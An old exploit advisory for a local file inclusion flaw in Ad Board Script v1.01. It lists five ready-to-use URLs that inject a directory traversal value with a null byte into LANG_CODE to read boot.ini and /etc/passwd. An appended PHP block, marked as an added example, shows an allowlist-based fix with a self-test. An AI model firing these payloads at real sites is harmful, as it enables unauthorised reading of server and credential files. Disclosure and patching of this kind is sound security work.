
# Title : Ad Board Script v1.01 Local File Inclusion
# Published : 2010-03-13
# Author : ItSecTeam


hi

-------

#########################local file include#################
Author: ItSecTeam

download from:http://www.phpkobo.com/scripts/AF201_101/AF201_101.zip

script:Ad Board Script

Version:1.01

Updated:2010-01-10

dork::D
##########################################

vul:/path/web/codelib/cfg/common.inc.php line 21:

require( "res.{$LANG_CODE}.sys.inc.php" );

-----------------------------------------

xpl:/path/web/codelib/cfg/common.inc.php?LANG_CODE=..//..//..//..//boot.ini%00 and /etc/passwd%00

xpl:/path/web/codelib/sys/common.inc.php?LANG_CODE=..//..//..//..//boot.ini%00 and /etc/passwd%00

xpl:/path/web/staff/common.inc.php?LANG_CODE=..//..//..//..//boot.ini%00 and /etc/passwd%00

xpl:/path/web/staff/file.php?LANG_CODE=..//..//..//..//boot.ini%00 and /etc/passwd%00

xpl:/path/web/staff/app/common.inc.php?LANG_CODE=..//..//..//..//boot.ini%00 and /etc/passwd%00
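
fix (added example, not part of the original advisory and not the vendor's code): the require on line 21 builds its file name from LANG_CODE, so the value has to be checked against a fixed list before it reaches require. The language list, the names ALLOWED_LANGS, DEFAULT_LANG and resolve_lang_file(), and the assumption that LANG_CODE arrives in the query string (as the URLs above show) are hypothetical.

```php
<?php
// Added example, not Ad Board Script code. ALLOWED_LANGS, DEFAULT_LANG and
// resolve_lang_file() are hypothetical names; the language list is assumed.
const ALLOWED_LANGS = ['en', 'fr', 'de'];
const DEFAULT_LANG  = 'en';

// Map a requested language code to a resource file that must live inside $dir.
function resolve_lang_file(string $dir, $requested): string
{
    // Strict allowlist match: arrays, NUL bytes, slashes, dots and unknown
    // codes never reach the file name; they fall back to the default.
    $lang = (is_string($requested) && in_array($requested, ALLOWED_LANGS, true))
        ? $requested
        : DEFAULT_LANG;

    // Defence in depth: canonicalise and confirm the file stays under $dir.
    $base = realpath($dir);
    $path = realpath($dir . DIRECTORY_SEPARATOR . "res.{$lang}.sys.inc.php");
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        throw new RuntimeException('language resource missing or outside base directory');
    }
    return $path;
}

// In common.inc.php the vulnerable line would become:
//   require resolve_lang_file(__DIR__, $_GET['LANG_CODE'] ?? null);

// Self-check on constructed input: a temp directory holding one resource file.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'lang_demo_' . getmypid();
@mkdir($dir);
$res = $dir . DIRECTORY_SEPARATOR . 'res.en.sys.inc.php';
file_put_contents($res, "<?php return 'en resources loaded';");

// Constructed request values, including the pattern reported in the advisory.
$inputs = ['en', '..//..//..//..//boot.ini' . "\0", ['x'], null];
foreach ($inputs as $input) {
    $file   = resolve_lang_file($dir, $input);
    $result = require $file;
    echo basename($file), ' => ', $result, PHP_EOL;   // always res.en.sys.inc.php
}

unlink($res);
rmdir($dir);
```
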

########################

discovered by ahmadbady

########################